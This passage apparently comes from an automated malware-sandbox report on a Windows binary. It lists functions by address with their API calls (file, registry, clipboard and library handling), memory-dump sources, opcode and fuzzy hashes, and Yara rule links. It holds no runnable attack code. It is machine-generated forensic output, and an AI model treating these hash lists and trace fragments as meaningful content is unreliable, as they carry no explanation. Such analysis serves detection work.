                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                    Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3655998216-0
                                                                                                                                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                    • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                    Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                                    • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                    • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                    Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                    Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                    Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                    • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
